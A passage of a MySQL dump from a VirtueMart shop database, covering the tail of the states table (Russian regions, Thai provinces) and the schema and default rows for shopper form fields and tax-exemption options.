00:00:00',0),(628,1,176,0,'Саратовская область','SAR','64',59,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(629,1,176,0,'Саха (Якутия) Республика','SA','14',60,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(630,1,176,0,'Сахалинская область','SAK','65',61,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(631,1,176,0,'Свердловская область','SVE','66',62,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(632,1,176,0,'Северная Осетия-Алания Республика','SE','15',63,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(633,1,176,0,'Смоленская область','SMO','67',64,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(634,1,176,0,'Ставропольский край','STA','26',65,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(635,1,176,0,'Тамбовская область','TAM','68',66,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(636,1,176,0,'Татарстан Республика','TA','16',67,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(637,1,176,0,'Тверская область','TVE','69',68,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(638,1,176,0,'Томская область','TOM','70',69,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(639,1,176,0,'Тульская область','TUL','71',70,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(640,1,176,0,'Тыва Республика','TY','17',71,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(641,1,176,0,'Тюменская область','TYU','72',72,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(642,1,176,0,'Удмуртская Республика','UD','18',73,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(643,1,176,0,'Ульяновская область','ULY','73',74,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(644,1,176,0,'Хакасия Республика','KK','19',75,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(645,1,176,0,'Челябинская область','CHE','74',76,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(646,1,176,0,'Чеченская Республика','CE','20',77,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(647,1,176,0,'Чувашская Республика','CU','21',78,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(648,1,176,0,'Чукотский автономный округ','CHU','87',79,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(649,1,176,0,'Хабаровский край','KHA','27',80,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(650,1,176,0,'Ханты-Мансийский автономный округ','KHM','86',81,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(651,1,176,0,'Ямало-Ненецкий автономный округ','YAN','89',82,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(652,1,176,0,'Ярославская область','YAR','76',83,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(653,1,209,0,'กระบี่','กบ','กบ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(654,1,209,0,'กรุงเทพมหานคร','กทม','กท',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(655,1,209,0,'กาญจนบุรี','กจ','กจ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(656,1,209,0,'กาฬสินธุ์','กส','กส',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(657,1,209,0,'กำแพงเพชร','กพ','กพ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(658,1,209,0,'ขอนแก่น','ขก','ขก',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(659,1,209,0,'จันทบุรี','จบ','จบ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(660,1,209,0,'ฉะเชิงเทรา','ฉช','ฉช',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(661,1,209,0,'ชลบุรี','ชบ','ชบ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(662,1,209,0,'ชัยนาท','ชน','ชน',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(663,1,209,0,'ชัยภูมิ','ชย','ชย',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(664,1,209,0,'ชุมพร','ชพ','ชพ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(665,1,209,0,'เชียงราย','ชร','ชร',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(666,1,209,0,'เชียงใหม่','ชม','ชม',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(667,1,209,0,'ตรัง','ตง','ตง',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(668,1,209,0,'ตราด','ตร','ตร',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(669,1,209,0,'ตาก','ตก','ตก',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(670,1,209,0,'นครนายก','นย','นย',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(671,1,209,0,'นครปฐม','นฐ','นฐ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(672,1,209,0,'นครพนม','นพ','นพ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(673,1,209,0,'นครราชสีมา','นม','นม',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(674,1,209,0,'นครศรีธรรมราช','นศ','นศ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(675,1,209,0,'นครสวรรค์','นว','นว',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(676,1,209,0,'นนทบุรี','นบ','นบ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(677,1,209,0,'นราธิวาส','นธ','นธ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(678,1,209,0,'น่าน','นน','นน',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(679,1,209,0,'บุรีรัมย์','บร','บร',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(680,1,209,0,'บึงกาฬ','บก','บก',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(681,1,209,0,'ปทุมธานี','ปท','ปท',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(682,1,209,0,'ประจวบคีรีขันธ์','ปข','ปข',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(683,1,209,0,'ปราจีนบุรี','ปจ','ปจ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(684,1,209,0,'ปัตตานี','ปน','ปน',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(685,1,209,0,'พระนครศรีอยุธยา','อย','อย',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(686,1,209,0,'พังงา','พง','พง',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(687,1,209,0,'พัทลุง','พท','พท',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(688,1,209,0,'พิจิตร','พจ','พจ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(689,1,209,0,'พิษณุโลก','พล','พล',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(690,1,209,0,'เพชรบุรี','พบ','พบ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(691,1,209,0,'เพชรบูรณ์','พช','พช',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(692,1,209,0,'แพร่','พร','พร',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(693,1,209,0,'พะเยา','พย','พย',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(694,1,209,0,'ภูเก็ต','ภก','ภก',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(695,1,209,0,'มหาสารคาม','มค','มค',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(696,1,209,0,'แม่ฮ่องสอน','มส','มส',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(697,1,209,0,'มุกดาหาร','มห','มห',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(698,1,209,0,'ยะลา','ยล','ยล',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(699,1,209,0,'ยโสธร','ยส','ยส',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(700,1,209,0,'ร้อยเอ็ด','รอ','รอ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(701,1,209,0,'ระนอง','รน','รน',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(702,1,209,0,'ระยอง','รย','รย',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(703,1,209,0,'ราชบุรี','รบ','รบ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(704,1,209,0,'ลพบุรี','ลบ','ลบ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(705,1,209,0,'ลำปาง','ลป','ลป',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(706,1,209,0,'ลำพูน','ลพ','ลพ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(707,1,209,0,'เลย','ลย','ลย',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(708,1,209,0,'ศรีสะเกษ','ศก','ศก',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(709,1,209,0,'สกลนคร','สน','สน',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(710,1,209,0,'สงขลา','สข','สข',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(711,1,209,0,'สตูล','สต','สต',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(712,1,209,0,'สมุทรปราการ','สป','สป',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(713,1,209,0,'สมุทรสงคราม','สส','สส',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(714,1,209,0,'สมุทรสาคร','สค','สค',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(715,1,209,0,'สระบุรี','สบ','สบ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(716,1,209,0,'สระแก้ว','สก','สก',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(717,1,209,0,'สิงห์บุรี','สห','สห',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(718,1,209,0,'สุโขทัย','สท','สท',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(719,1,209,0,'สุพรรณบุรี','สพ','สพ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(720,1,209,0,'สุราษฎร์ธานี','สฎ','สฎ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(721,1,209,0,'สุรินทร์','สร','สร',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(722,1,209,0,'หนองคาย','นค','นค',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(723,1,209,0,'หนองบัวลำภู','นภ','นภ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(724,1,209,0,'อ่างทอง','อท','อท',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(725,1,209,0,'อุดรธานี','อด','อด',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(726,1,209,0,'อุตรดิตถ์','อต','อต',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(727,1,209,0,'อุทัยธานี','อน','อน',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(728,1,209,0,'อุบลราชธานี','อบ','อบ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(729,1,209,0,'อำนาจเจริญ','อจ','อจ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `fz6t4_virtuemart_states` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_userfield_values`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_userfield_values`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_userfield_values` (
  `virtuemart_userfield_value_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_userfield_id` int unsigned NOT NULL DEFAULT '0',
  `fieldtitle` varchar(255) NOT NULL DEFAULT '',
  `fieldvalue` varchar(255) NOT NULL DEFAULT '',
  `sys` tinyint NOT NULL DEFAULT '0',
  `ordering` int NOT NULL DEFAULT '0',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_userfield_value_id`),
  KEY `virtuemart_userfield_id` (`virtuemart_userfield_id`)
) ENGINE=MyISAM AUTO_INCREMENT=23 DEFAULT CHARSET=utf8mb3 COMMENT='Holds the different values for dropdown and radio lists';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_userfield_values`
--

LOCK TABLES `fz6t4_virtuemart_userfield_values` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_userfield_values` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_userfield_values` VALUES (1,10,'COM_VIRTUEMART_SHOPPER_TITLE_MR','Mr',0,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(2,10,'COM_VIRTUEMART_SHOPPER_TITLE_MRS','Mrs',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(3,26,'None','',0,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(4,26,'Non-resident (Canada)','R',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(5,26,'Federal government (United States)','A',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(6,26,'State government (United States)','B',0,2,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(7,26,'Tribe / Status Indian / Indian Band (both)','C',0,3,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(8,26,'Foreign diplomat (both)','D',0,4,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(9,26,'Charitable or benevolent org (both)','E',0,5,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(10,26,'Religious or educational org (both)','F',0,6,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(11,26,'Resale (both)','G',0,7,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(12,26,'Commercial agricultural production (both)','H',0,8,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(13,26,'Industrial production / manufacturer (both)','I',0,9,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(14,26,'Direct pay permit (United States)','J',0,10,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(15,26,'Direct mail (United States)','K',0,11,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(16,26,'Other (both)','L',0,12,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(17,26,'Local government (United States)','N',0,13,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(18,26,'Commercial aquaculture (Canada)','P',0,14,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(19,26,'Commercial Fishery (Canada)','Q',0,15,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(20,22,'','',0,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(21,9,'','',0,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(22,1,'','',0,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `fz6t4_virtuemart_userfield_values` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_userfields`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_userfields`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_userfields` (
  `virtuemart_userfield_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_vendor_id` int unsigned NOT NULL DEFAULT '1',
  `userfield_jplugin_id` int NOT NULL DEFAULT '0',
  `name` varchar(250) NOT NULL DEFAULT '',
  `title` varchar(255) NOT NULL DEFAULT '',
  `description` varchar(2048) DEFAULT NULL,
  `type` varchar(70) NOT NULL DEFAULT '',
  `maxlength` int DEFAULT NULL,
  `size` int DEFAULT NULL,
  `required` tinyint NOT NULL DEFAULT '0',
  `cols` int DEFAULT NULL,
  `rows` int DEFAULT NULL,
  `value` varchar(255) DEFAULT NULL,
  `default` varchar(255) DEFAULT NULL,
  `placeholder` varchar(255) DEFAULT NULL,
  `registration` tinyint(1) NOT NULL DEFAULT '0',
  `shipment` tinyint(1) NOT NULL DEFAULT '0',
  `account` tinyint(1) NOT NULL DEFAULT '1',
  `cart` tinyint(1) NOT NULL DEFAULT '0',
  `readonly` tinyint(1) NOT NULL DEFAULT '0',
  `calculated` tinyint(1) NOT NULL DEFAULT '0',
  `sys` tinyint NOT NULL DEFAULT '0',
  `userfield_params` text,
  `ordering` int NOT NULL DEFAULT '0',
  `shared` tinyint(1) NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_userfield_id`),
  UNIQUE KEY `name` (`name`),
  KEY `virtuemart_vendor_id` (`virtuemart_vendor_id`),
  KEY `ordering` (`ordering`),
  KEY `shared` (`shared`),
  KEY `published` (`published`),
  KEY `account` (`account`),
  KEY `shipment` (`shipment`),
  KEY `cart` (`cart`)
) ENGINE=MyISAM AUTO_INCREMENT=27 DEFAULT CHARSET=utf8mb3 COMMENT='Holds the fields for the user information';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_userfields`
--

LOCK TABLES `fz6t4_virtuemart_userfields` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_userfields` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_userfields` VALUES (1,1,0,'email','COM_VIRTUEMART_REGISTER_EMAIL','','emailaddress',100,30,1,0,0,NULL,'',NULL,1,0,1,0,0,0,1,'',4,0,1,'2017-11-05 11:33:49',676,'2017-11-05 11:33:49',676,'0000-00-00 00:00:00',0),(2,0,0,'password','COM_VIRTUEMART_SHOPPER_FORM_PASSWORD_1','','password',25,30,1,NULL,NULL,NULL,NULL,NULL,1,0,1,0,0,0,1,'',10,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(3,0,0,'password2','COM_VIRTUEMART_SHOPPER_FORM_PASSWORD_2','','password',25,30,1,NULL,NULL,NULL,NULL,NULL,1,0,1,0,0,0,1,'',12,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(4,0,0,'agreed','COM_VIRTUEMART_I_AGREE_TO_TOS','','checkbox',NULL,NULL,1,NULL,NULL,NULL,NULL,NULL,1,0,1,0,0,0,1,'',13,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(5,0,0,'name','COM_VIRTUEMART_USER_DISPLAYED_NAME','','text',25,30,1,0,0,'',NULL,NULL,1,0,1,0,0,0,1,'',8,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(6,0,0,'username','COM_VIRTUEMART_USERNAME','','text',25,30,1,0,0,'',NULL,NULL,1,0,1,0,0,0,1,'',6,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(7,0,0,'address_type_name','COM_VIRTUEMART_USER_FORM_ADDRESS_LABEL','','text',32,30,1,NULL,NULL,NULL,'Shipment',NULL,0,1,0,0,0,0,1,'',16,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(8,0,0,'delimiter_billto','COM_VIRTUEMART_USER_FORM_BILLTO_LBL','','delimiter',25,30,0,NULL,NULL,NULL,NULL,NULL,1,0,1,0,0,0,0,'',18,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(9,1,0,'company','COM_VIRTUEMART_SHOPPER_FORM_COMPANY_NAME','','text',64,30,0,0,0,NULL,'',NULL,1,1,1,0,0,0,1,'',20,0,1,'2017-11-05 11:32:58',676,'2017-11-05 11:34:22',676,'0000-00-00 00:00:00',0),(10,0,0,'title','COM_VIRTUEMART_SHOPPER_FORM_TITLE','','select',0,210,0,NULL,NULL,NULL,NULL,NULL,1,0,1,0,0,0,1,'',22,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(11,0,0,'first_name','COM_VIRTUEMART_SHOPPER_FORM_FIRST_NAME','','text',32,30,1,NULL,NULL,NULL,NULL,NULL,1,1,1,0,0,0,1,'',24,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(12,0,0,'middle_name','COM_VIRTUEMART_SHOPPER_FORM_MIDDLE_NAME','','text',32,30,0,NULL,NULL,NULL,NULL,NULL,1,1,1,0,0,0,1,'',26,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(13,0,0,'last_name','COM_VIRTUEMART_SHOPPER_FORM_LAST_NAME','','text',32,30,1,NULL,NULL,NULL,NULL,NULL,1,1,1,0,0,0,1,'',28,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(14,0,0,'address_1','COM_VIRTUEMART_SHOPPER_FORM_ADDRESS_1','','text',64,30,1,NULL,NULL,NULL,NULL,NULL,1,1,1,0,0,0,1,'',30,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(15,0,0,'address_2','COM_VIRTUEMART_SHOPPER_FORM_ADDRESS_2','','text',64,30,0,NULL,NULL,NULL,NULL,NULL,1,1,1,0,0,0,1,'',32,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(16,0,0,'zip','COM_VIRTUEMART_SHOPPER_FORM_ZIP','','text',32,30,1,NULL,NULL,NULL,NULL,NULL,1,1,1,0,0,0,1,'',34,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(17,0,0,'city','COM_VIRTUEMART_SHOPPER_FORM_CITY','','text',32,30,1,NULL,NULL,NULL,NULL,NULL,1,1,1,0,0,0,1,'',36,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(18,0,0,'virtuemart_country_id','COM_VIRTUEMART_SHOPPER_FORM_COUNTRY','','select',0,210,1,NULL,NULL,NULL,NULL,NULL,1,1,1,0,0,0,1,'',38,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(19,0,0,'virtuemart_state_id','COM_VIRTUEMART_SHOPPER_FORM_STATE','','select',0,210,1,NULL,NULL,NULL,NULL,NULL,1,1,1,0,0,0,1,'',40,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(20,0,0,'phone_1','COM_VIRTUEMART_SHOPPER_FORM_PHONE','','text',32,30,0,NULL,NULL,NULL,NULL,NULL,1,1,1,0,0,0,1,'',42,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(21,0,0,'phone_2','COM_VIRTUEMART_SHOPPER_FORM_PHONE2','','text',32,30,0,NULL,NULL,NULL,NULL,NULL,1,1,1,0,0,0,1,'',44,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(22,1,0,'fax','COM_VIRTUEMART_SHOPPER_FORM_FAX','','text',32,30,0,0,0,NULL,'',NULL,1,1,1,0,0,0,1,'',46,0,1,'2017-11-05 